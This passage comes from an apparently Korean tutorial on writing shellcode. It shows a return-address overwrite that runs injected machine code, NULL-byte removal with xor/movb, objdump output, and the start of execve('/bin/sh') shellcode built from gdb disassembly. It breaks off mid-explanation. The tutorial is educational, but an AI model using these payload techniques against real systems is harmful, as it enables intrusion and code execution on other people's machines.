\uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \uc5bb\uc744\uc218 \uc788\ub2e4. <br \/><br \/>\uc774 code\ub97c \uc815\ub9ac\ud574\uc11c main()\uc758 ret\uc8fc\uc18c\uc5d0 \ub123\uc5b4 \uc2e4\ud589\ud574 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test41.c <br \/>char print_code[] = <br \/>\"\\xeb\\x20\\x5e\\xb8\\x04\\x00\\x00\\x00\\xbb\\x01\\x00\\x00\\x00\\x89\\xf1\\xba\\x17\\x00\\x00\\x00\" <br \/>\"\\xcd\\x80\\xb8\\x01\\x00\\x00\\x00\\xbb\\x00\\x00\\x00\\x00\\xcd\\x80\\xe8\\xdb\\xff\\xff\\xff\" <br \/>\"I'm willy in Null@Root\\n\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)print_code; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test41.c -o test41 <br \/>[willy@Null@Root]$ .\/test41 <br \/>I'm willy in Null@Root <br \/><br \/>\uc5ec\uae30\uae4c\uc9c0\ub294 \uc131\uacf5\ud588\ub2e4.. \uadf8\ub7fc \ubaa8\ub4e0\uac83\uc774 \ub05d\ub09c\uac83\uc77c\uae4c? print_code\ub97c \uc798 \ubcf4\uba74 \uc54c\uaca0\uc9c0\ub9cc code\uc911\uac04\uc5d0&nbsp; <br \/>NULL(0x00)\uc774 \ud3ec\ud568\ub418\uc5b4\uc788\ub294 \uac83\uc744 \ubcfc\uc218\uc788\ub2e4. \uc77c\ubc18\uc801\uc778 \uc785\ub825\uc778 \uacbd\uc6b0 buf\uc5d0 code\uc785\ub825\uc2dc \uc911\uac04\uc5d0 NULL\uc774 <br \/>\uc788\ub294 \uacbd\uc6b0 \ubb38\uc790\uc5f4\uc758 \ub05d\uc73c\ub85c \uc778\uc2dd\ud558\uc5ec \ub354\uc774\uc0c1 \ubc1b\uc9c0 \uc54a\uc744\uac83\uc774\ub2e4. \uc989 \uc804\uccb4\uc758 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \uc785\ub825\ud558\ub294&nbsp; <br \/>\uac83\uc774 \ubd88\uac00\ub2a5\ud574 \uc9c0\ubbc0\ub85c \uc5c6\uc560\uc57c \ud55c\ub2e4. NULL\uc744 \uc0ad\uc81c\ud558\ub294 \ubc29\ubc95\uc73c\ub85c\ub294 \uac19\uc740 \uae30\ub2a5\uc744 \ud558\ub294 \ub2e4\ub978 \uba85\ub839\uc5b4\ub85c <br \/>\ub300\uccb4 \uc0ac\uc6a9\ud558\uac70\ub098 \ucc98\ub9ac\ud558\ub294 data\ud06c\uae30\ub97c \ubcc0\uacbd\ud558\ub294 \ubc29\ubc95\uc774 \uc788\uc744\uc218 \uc788\ub2e4.&nbsp; \uc608\ub97c \ub4e4\uc5b4 %eax\uc5d0 0x00\uc744 <br \/>\ub123\uc5b4\uc57c \ud55c\ub294 \uacbd\uc6b0 movl $0x00, %eax\ub300\uc2e0\uc5d0 xor %eax,%eax\uc640 \uac19\uc740 \ubc30\ud0c0\uc801 \ub17c\ub9ac\ub97c \uc774\uc6a9\ud558\uc5ec NULL\uc744&nbsp; <br \/>\ud53c\ud560\uc218 \uc788\uc73c\uba70, \uc791\uc740 \ub2e8\uc7040x10\uc744 \ub123\uc5b4\uc57c \uacbd\uc6b0 movl $0x10, %eax\uc744 \uc4f0\uba74 4\ubc14\uc774\ud2b8\uc5d0 \uc4f0\uc5ec\uc9c0\uac8c \ub418\ubbc0\ub85c <br \/>0x00000010\uc774 \ub418\uc5b4 3\uac1c\uc758 NULL\uc774 \ub9cc\ub4e4\uc5b4\uc9c0\uac8c \ub418\ubbc0\ub85c movb %0x10,%al \uc774\ub807\uac8c \ud06c\uae30\ub97c \uc791\uac8c\ud574\uc11c \uacc4\uc0b0 <br \/>\ud558\uc5ec \ud53c\ud560\uc218 \uc788\ub2e4. <br \/><br \/>\uc790 \uadf8\ub7fc \uc5ec\uae30\uc11c Null\uc774 \ub098\ud0c0\ub098\uc9c0 \uc54a\ud1a0\ub85d \uc5b4\uc148\ube14\ub9ac \uba85\ub839\uc5b4\ub97c \uc218\uc815\ud574 \ubcf4\uc790. <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | &nbsp; &nbsp; \uc218\uc815 \uc804 &nbsp; &nbsp; &nbsp;&nbsp; | &nbsp; &nbsp; &nbsp; \uc218\uc815 \ud6c4 &nbsp; &nbsp; &nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \uc124 &nbsp; &nbsp; \uba85 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x04, %eax&nbsp; | xor &nbsp;&nbsp; %eax, %eax &nbsp; | xor \uc774\uc6a9 eax\ub97c 0x00000000\uc73c\ub85c \ub9cc\ub4e0\ub4a4&nbsp; | <br \/>&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | movb &nbsp; $0x04, %al &nbsp; | \ub9c8\uc9c0\ub9c9 1\ubc14\uc774\ud2b8\uc5d0 0x04\ub97c \ub123\uc74c. &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x01, %ebx&nbsp; | xor &nbsp;&nbsp; %ebx, %ebx &nbsp; | xor \uc774\uc6a9 eax\ub97c 0x00000000\uc73c\ub85c \ub9cc\ub4e0\ub4a4&nbsp; | &nbsp; <br \/>&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | movb &nbsp; $0x01, %bl &nbsp; | \ub9c8\uc9c0\ub9c9 1\ubc14\uc774\ud2b8\uc5d0 0x01\ub97c \ub123\uc74c. &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x17, %edx&nbsp; | xor &nbsp;&nbsp; %edx, %edx &nbsp; | xor \uc774\uc6a9 eax\ub97c 0x00000000\uc73c\ub85c \ub9cc\ub4e0\ub4a4&nbsp; | <br \/>&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | movb &nbsp; $0x17, %dl &nbsp; | \ub9c8\uc9c0\ub9c9 1\ubc14\uc774\ud2b8\uc5d0 0x17\ub97c \ub123\uc74c. &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x01, %eax&nbsp; | xor &nbsp;&nbsp; %eax, %eax &nbsp; | xor \uc774\uc6a9 eax\ub97c 0x00000000\uc73c\ub85c \ub9cc\ub4e0\ub4a4&nbsp; | <br \/>&nbsp; | &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; | movb &nbsp; $0x01, %al &nbsp; | \ub9c8\uc9c0\ub9c9 1\ubc14\uc774\ud2b8\uc5d0 0x01\ub97c \ub123\uc74c. &nbsp; &nbsp; &nbsp; &nbsp; | <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/>&nbsp; | movl&nbsp; $0x00, %ebx&nbsp; | xor &nbsp;&nbsp; %ebx, %ebx &nbsp; | xor %ebx %ebx\ub294 \ub450 \uac12\uc774 \uac19\uc740\uacbd\uc6b0 0\uc774\ub428| <br \/>&nbsp; +--------------------+---------------------+---------------------------------------+ <br \/><br \/>\uc774\ub807\uac8c \uc218\uc815\ud55c \ub0b4\uc6a9\uc744 test24.s\uc5d0 \ubc18\uc601\ud558\uc5ec \uc544\ub798\uc640 test25.s\uc640 \uac19\uc774 \ub9cc\ub4e4\uc218 \uc788\ub2e4. <br \/>[willy@Null@Root]$ cat test25.s <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp; &nbsp; strings <br \/>start:&nbsp; popl &nbsp;&nbsp; %esi <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %eax, %eax <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %ebx, %ebx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %edx, %edx <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x04, %al &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x01, %bl &nbsp; &nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esi,&nbsp; %ecx &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x17, %dl &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movb &nbsp;&nbsp; $0x01, %al &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp; &nbsp; %ebx, %ebx &nbsp;&nbsp; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; int &nbsp; &nbsp; $0x80 &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; <br \/>strings:call start <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \"I'm Willy in Null@Root\\n\"&nbsp; <br \/><br \/>[willy@Null@Root]$ gcc test25.s -o test25 <br \/>[willy@Null@Root]$ .\/test25 <br \/>I'm Willy in Null@Root <br \/><br \/>\ucef4\ud37c\uc77c\ud558\uc5ec \uc2e4\ud589\uacb0\uacfc \uc544\ubb34\ub7f0 \ubb38\uc81c\uac00 \uc5c6\ub294 \uac83\uc744 \ud655\uc778\ud558\uc600\uc73c\uba70 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c \uc5bb\uae30\uc704\ud574 objdump\ub97c&nbsp; <br \/>\uc2e4\ud589\ud574 \ubcf4\uba74. <br \/><br \/>[willy@Null@Root]$ objdump -d test25 <br \/><br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : &nbsp;&nbsp; <br \/>0804841c &lt;main&gt;: <br \/>804841c: &nbsp; &nbsp; &nbsp; eb 17 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jmp &nbsp;&nbsp; 8048435 &lt;strings&gt; <br \/><br \/>0804841e &lt;start&gt;: <br \/>804841e: &nbsp; &nbsp; &nbsp; 5e &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %esi <br \/>804841f: &nbsp; &nbsp; &nbsp; 31 c0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp;&nbsp; %eax,%eax <br \/>8048421: &nbsp; &nbsp; &nbsp; 31 db &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp;&nbsp; %ebx,%ebx <br \/>8048423: &nbsp; &nbsp; &nbsp; 31 d2 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp;&nbsp; %edx,%edx <br \/>8048425: &nbsp; &nbsp; &nbsp; b0 04 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; $0x4,%al <br \/>8048427: &nbsp; &nbsp; &nbsp; b3 01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; $0x1,%bl <br \/>8048429: &nbsp; &nbsp; &nbsp; 89 f1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; %esi,%ecx <br \/>804842b: &nbsp; &nbsp; &nbsp; b2 17 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; $0x17,%dl <br \/>804842d: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/>804842f: &nbsp; &nbsp; &nbsp; b0 01 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; mov &nbsp;&nbsp; $0x1,%al <br \/>8048431: &nbsp; &nbsp; &nbsp; 31 db &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; xor &nbsp;&nbsp; %ebx,%ebx <br \/>8048433: &nbsp; &nbsp; &nbsp; cd 80 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; int &nbsp;&nbsp; $0x80 <br \/><br \/>08048435 &lt;strings&gt;: <br \/>8048435: &nbsp; &nbsp; &nbsp; e8 e4 ff ff ff &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 804841e &lt;start&gt; <br \/>804843a: &nbsp; &nbsp; &nbsp; 49 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; dec &nbsp;&nbsp; %ecx <br \/>804843b: &nbsp; &nbsp; &nbsp; 27 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; daa &nbsp; &nbsp; <br \/>804843c: &nbsp; &nbsp; &nbsp; 6d &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insl &nbsp; (%dx),%es:(%edi) <br \/>804843d: &nbsp; &nbsp; &nbsp; 20 57 69 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; and &nbsp;&nbsp; %dl,0x69(%edi) <br \/>8048440: &nbsp; &nbsp; &nbsp; 6c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insb &nbsp; (%dx),%es:(%edi) <br \/>8048441: &nbsp; &nbsp; &nbsp; 6c &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; insb &nbsp; (%dx),%es:(%edi) <br \/>8048442: &nbsp; &nbsp; &nbsp; 79 20 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; jns &nbsp;&nbsp; 8048464 &lt;__do_global_ctors_aux+0x4&gt; <br \/>8048444: &nbsp; &nbsp; &nbsp; 69 6e 20 4e 75 6c 6c &nbsp;&nbsp; imul &nbsp; $0x6c6c754e,0x20(%esi),%ebp <br \/>804844b: &nbsp; &nbsp; &nbsp; 40 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; inc &nbsp;&nbsp; %eax <br \/>804844c: &nbsp; &nbsp; &nbsp; 52 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %edx <br \/>804844d: &nbsp; &nbsp; &nbsp; 6f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; outsl&nbsp; %ds:(%esi),(%dx) <br \/>804844e: &nbsp; &nbsp; &nbsp; 6f &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; outsl&nbsp; %ds:(%esi),(%dx) <br \/>804844f: &nbsp; &nbsp; &nbsp; 74 0a &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; je &nbsp; &nbsp; 804845b &lt;strings+0x26&gt; <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp; : &nbsp; <br \/>\uc704\uc5d0 \ub098\ud0c0\ub09c \uacb0\uacfc\uc640 \uac19\uc774 \uae30\uacc4\uc5b4\ucf54\ub4dc\uc911\uc5d0 NULL \ucf54\ub4dc\uac00 \uc5c6\ub294 \uac83\uc744 \ud655\uc778\ud560\uc218 \uc788\ub2e4.&nbsp; \uc544\ub798 test42.c <br \/>\ub294 \uc704\uc5d0\uc11c \uc5bb\uc740 \uae30\uacc4\uc5b4\ucf54\ub4dc\ub97c main()\uc758 ret\uc5d0 \ub123\uace0 \uc2e4\ud589\ud558\ub294 \ud504\ub85c\uadf8\ub7a8\uc774\ub2e4. <br \/><br \/>[willy@Null@Root]$ cat test42.c&nbsp; <br \/>char print_code[] = <br \/>\"\\xeb\\x17\\x5e\\x31\\xc0\\x31\\xdb\\x31\\xd2\\xb0\\x04\\xb3\\x01\\x89\\xf1\" <br \/>\"\\xb2\\x17\\xcd\\x80\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\xe4\\xff\\xff\\xff\" <br \/>\"I'm willy in Null@Root\\n\"; <br \/><br \/>main() <br \/>{ <br \/>&nbsp;&nbsp; int *ret; <br \/><br \/>&nbsp;&nbsp; ret = (int *)&amp;ret + 2; <br \/>&nbsp;&nbsp; (*ret) = (int)print_code; <br \/>} <br \/><br \/>[willy@Null@Root]$ gcc test42.c -o test42 <br \/>[willy@Null@Root]$ .\/test42 <br \/>I'm willy in Null@Root <br \/><br \/>\ubb38\uc81c\uc5c6\uc774 \uc798 \uc2e4\ud589\ub418\ub294 \uac83\uc744 \ubcfc\uc218 \uc788\ub2e4.&nbsp; \uc9c0\uae08\uae4c\uc9c0 Shellcode\ub9cc\ub4e4\uae30 \uc704\ud55c \uae30\ubcf8 \uc9c0\uc2dd\uc740 \ub2e4 \ubc30\uc6e0\ub2e4.&nbsp; <br \/>\ud2b9\ud788 system call\uac1c\ub150\uacfc \ubb38\uc790\uc5f4\uc758 \uc0c1\ub300\uc8fc\uc18c\ub97c \uad6c\ud558\ub294 \ubc29\ubc95\uc744 \uc774\ud574\ud558\uc600\ub2e4\uba74 Shellcode \ubfd0\ub9cc \uc544\ub2c8\ub77c <br \/>system call\uc744 \uc774\uc6a9\ud55c \uc2dc\uc2a4\ud15c\uc5d0 \uae30\ubcf8 \ub8e8\ud2f4(\ud568\uc218)\ub97c \uc218\ud589\ud558\ub294\ub370 \uc5b4\ub824\uc6c0\uc774 \uc5c6\uc744 \uac83\uc774\ub2e4.&nbsp; <br \/><br \/>&lt;shellcode \ub9cc\ub4e4\uae30&gt; <br \/>\uc774\uc81c \ubcf8\uaca9\uc801\uc73c\ub85c shellcode\ub97c \ub9cc\ub4dc\ub294 \uc791\uc5c5\uc744 \ud574\ubcf4\uc790. \uc77c\ubc18\uc801\uc73c\ub85c \uac00\uc7a5 \uac04\ub2e8\ud558\uac8c shell\uc744 \ub744\uc6b0\ub294 \ubc29\ubc95 <br \/>\uc5d0\ub294 system()\uc774\ub098 execve()\uc885\ub958\uc758 \ud568\uc218\ub97c \uc368\uc11c \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e4\uc218 \uc788\ub2e4. \uadf8\uc911\uc5d0\uc11c system call\uc744&nbsp; <br \/>\ud560\uc218 \ud568\uc218\ub97c \/usr\/include\/asm\/unistd.h\uc5d0\uc11c \ucc3e\uc544\ubcf4\uba74 execve()\uc788\ub2e4. \uc774 \ud568\uc218\ub97c \uc774\uc6a9\ud558\uc5ec \uac04\ub2e8\ud55c&nbsp; <br \/>C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e4\uc5b4 \ubcf4\uc790. <br \/><br \/>[willy@Null@Root]$ cat test51.c <br \/>main() <br \/>{ <br \/>&nbsp; char *name[2]; <br \/>&nbsp; name[0] = \"\/bin\/sh\"; <br \/>&nbsp; name[1] = NULL; <br \/>&nbsp; execve(name[0],name,NULL); <br \/>} <br \/><br \/>\uc774\ub807\uac8c \ub9cc\ub4e4\uc218 \uc788\uc73c\uba70 \uc774\uac83\uc744 -stack \uc635\uc158\uc744 \ucd94\uac00\ud574\uc11c \ucef4\ud37c\uc77c \ud55c\ub4a4 gdb\ub85c disassemble\ud574\uc11c \ub0b4\uc6a9\ub97c <br \/>\uc0b4\ud3b4\ubcf4\uba74 \uc704\uc5d0\uc11c \uc124\uba85\ud588\ub358 write() \ud568\uc218\ubcf4\ub2e4 \ub2e4\uc18c \ubcf5\uc7a1\ud55c \uad6c\uc870\uc784\uc744 \uc54c\uc218 \uc788\ub2e4.&nbsp; <br \/><br \/>[willy@Null@Root]$ gcc test51.c -o test51 -mpreferred-stack-boundary=2 -static <br \/><br \/>[willy@Null@Root]$ gdb -q test51 <br \/>(gdb) disassemble main <br \/>Dump of assembler code for function main: <br \/>0x80481dc &lt;main&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebp <br \/>0x80481dd &lt;main+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; %esp,%ebp <br \/>0x80481df &lt;main+3&gt;: &nbsp; &nbsp; sub &nbsp;&nbsp; $0x8,%esp <br \/>0x80481e2 &lt;main+6&gt;: &nbsp; &nbsp; movl &nbsp; $0x808b228,0xfffffff8(%ebp) <br \/>0x80481e9 &lt;main+13&gt;: &nbsp;&nbsp; movl &nbsp; $0x0,0xfffffffc(%ebp) <br \/>0x80481f0 &lt;main+20&gt;: &nbsp;&nbsp; push &nbsp; $0x0 <br \/>0x80481f2 &lt;main+22&gt;: &nbsp;&nbsp; lea &nbsp;&nbsp; 0xfffffff8(%ebp),%eax <br \/>0x80481f5 &lt;main+25&gt;: &nbsp;&nbsp; push &nbsp; %eax <br \/>0x80481f6 &lt;main+26&gt;: &nbsp;&nbsp; pushl&nbsp; 0xfffffff8(%ebp) <br \/>0x80481f9 &lt;main+29&gt;: &nbsp;&nbsp; call &nbsp; 0x804c36c &lt;__execve&gt; <br \/>0x80481fe &lt;main+34&gt;: &nbsp;&nbsp; add &nbsp;&nbsp; $0xc,%esp <br \/>0x8048201 &lt;main+37&gt;: &nbsp;&nbsp; leave &nbsp; <br \/>0x8048202 &lt;main+38&gt;: &nbsp;&nbsp; ret &nbsp; &nbsp; <br \/>0x8048203 &lt;main+39&gt;: &nbsp;&nbsp; nop &nbsp; &nbsp; <br \/>End of assembler dump. <br \/>(gdb) disassemble __execve <br \/>Dump of assembler code for function __execve: <br \/>0x804c36c &lt;__execve&gt;: &nbsp; push &nbsp; %ebp <br \/>0x804c36d &lt;__execve+1&gt;: mov &nbsp;&nbsp; $0x0,%eax <br \/>0x804c372 &lt;__execve+6&gt;: mov &nbsp;&nbsp; %esp,%ebp <br \/>0x804c374 &lt;__execve+8&gt;: test &nbsp; %eax,%eax <br \/>0x804c376 &lt;__execve+10&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %edi <br \/>0x804c377 &lt;__execve+11&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %ebx <br \/>0x804c378 &lt;__execve+12&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0x8(%ebp),%edi <br \/>0x804c37b &lt;__execve+15&gt;: &nbsp; &nbsp; &nbsp;&nbsp; je &nbsp; &nbsp; 0x804c382 &lt;__execve+22&gt; <br \/>0x804c37d &lt;__execve+17&gt;: &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 0x0 <br \/>0x804c382 &lt;__execve+22&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0xc(%ebp),%ecx <br \/>0x804c385 &lt;__execve+25&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; 0x10(%ebp),%edx <br \/>0x804c388 &lt;__execve+28&gt;: &nbsp; &nbsp; &nbsp;&nbsp; push &nbsp; %ebx <br \/>0x804c389 &lt;__execve+29&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %edi,%ebx <br \/>0x804c38b &lt;__execve+31&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0xb,%eax <br \/>0x804c390 &lt;__execve+36&gt;: &nbsp; &nbsp; &nbsp;&nbsp; int &nbsp;&nbsp; $0x80 <br \/>0x804c392 &lt;__execve+38&gt;: &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %ebx <br \/>0x804c393 &lt;__execve+39&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %eax,%ebx <br \/>0x804c395 &lt;__execve+41&gt;: &nbsp; &nbsp; &nbsp;&nbsp; cmp &nbsp;&nbsp; $0xfffff000,%ebx <br \/>0x804c39b &lt;__execve+47&gt;: &nbsp; &nbsp; &nbsp;&nbsp; jbe &nbsp;&nbsp; 0x804c3ab &lt;__execve+63&gt; <br \/>0x804c39d &lt;__execve+49&gt;: &nbsp; &nbsp; &nbsp;&nbsp; neg &nbsp;&nbsp; %ebx <br \/>0x804c39f &lt;__execve+51&gt;: &nbsp; &nbsp; &nbsp;&nbsp; call &nbsp; 0x80483b4 &lt;__errno_location&gt; <br \/>0x804c3a4 &lt;__execve+56&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %ebx,(%eax) <br \/>0x804c3a6 &lt;__execve+58&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; $0xffffffff,%ebx <br \/>0x804c3ab &lt;__execve+63&gt;: &nbsp; &nbsp; &nbsp;&nbsp; mov &nbsp;&nbsp; %ebx,%eax <br \/>0x804c3ad &lt;__execve+65&gt;: &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %ebx <br \/>0x804c3ae &lt;__execve+66&gt;: &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %edi <br \/>0x804c3af &lt;__execve+67&gt;: &nbsp; &nbsp; &nbsp;&nbsp; pop &nbsp;&nbsp; %ebp <br \/>0x804c3b0 &lt;__execve+68&gt;: &nbsp; &nbsp; &nbsp;&nbsp; ret &nbsp; &nbsp; <br \/>End of assembler dump. <br \/><br \/>\uc6b0\ub9ac\uc758 \ubaa9\uc801\uc740 \uc704\uc758 disassemle \ub0b4\uc6a9\uc5d0\uc11c %eax,%ebx,%ecx,%edx... \uc5d0 \uc5b4\ub5a4 \uac12\ub4e4\uc774 \ub4e4\uc5b4\uac00\ub294\uc9c0\ub9cc <br \/>\uc54c\uc544\ub0bc\uc218 \uc788\uc73c\uba74 \ub41c\ub2e4. \ud558\ub098\uc529 \uc21c\uc11c\ub300\ub85c \ud6cc\ud130\ubcf4\uae30\ub85c \ud558\uc790.. \uba3c\uc800 main()\uc5d0\uc11c \uc778\uc218\uac00 \uc5b4\ub5bb\uac8c stack <br \/>\uc5d0 \ub4e4\uc5b4 \uac00\ub294\uc9c0 \ubcf4\uc790. <br \/><br \/>0x80481dc &lt;main&gt;: &nbsp; &nbsp; &nbsp; push &nbsp; %ebp <br \/>0x80481dd &lt;main+1&gt;: &nbsp; &nbsp; mov &nbsp;&nbsp; %esp,%ebp <br \/>\ud568\uc218\uc5d0 \ucca8\ub4e4\uc5b4 \uc624\uba74\uc11c %ebp\ub97c \ucd08\uae30 %esp\uac12\uc73c\ub85c \uc124\uc815\ud55c\ub2e4. <br \/><br \/>0x80481df &lt;main+3&gt;: &nbsp; &nbsp; sub &nbsp;&nbsp; $0x8,%esp <br \/>char *name[2];&nbsp; \uc8fc\uc18c(4\ubc14\uc774\ud2b8) * 2 = 8\ubc14\uc774\ud2b8\ub97c \ubcc0\uc218\uacf5\uac04\uc73c\ub85c \ud655\ubcf4. <br \/><br \/>0x80481e2 &lt;main+6&gt;: &nbsp; &nbsp; movl &nbsp; $0x808b228,0xfffffff8(%ebp) <br \/>name[0] = \"\/bin\/sh\";&nbsp; %ebp\ub97c \uae30\uc900\uc73c\ub85c -8\ubc14\uc774\ud2b8 \uc704\uce58\uc5d0 \ubb38\uc790\uc5f4\uc758 \uc8fc\uc18c\ub97c \ub123\uc74c. <br \/><br \/>0x80481e9 &lt;main+13&gt;: &nbsp;&nbsp; movl &nbsp; $0x0,0xfffffffc(%ebp) <br \/>name[1] = NULL; &nbsp;&nbsp; %ebp\uae30\uc900 -4\ubc14\uc774\ud2b8 \uc704\uce58\uc5d0 0\uc744 \ub123\uc74c. <br \/><br \/>0x80481f0 &lt;main+20&gt;: &nbsp;&nbsp; push &nbsp; $0x0 <br \/>0\uc744 stack\uc5d0 \uc800\uc7a5\ud568. <br \/><br \/>0x80481f2 &lt;main+22&gt;: &nbsp;&nbsp; lea &nbsp;&nbsp; 0xfffffff8(%ebp),%eax <br \/>%ebp 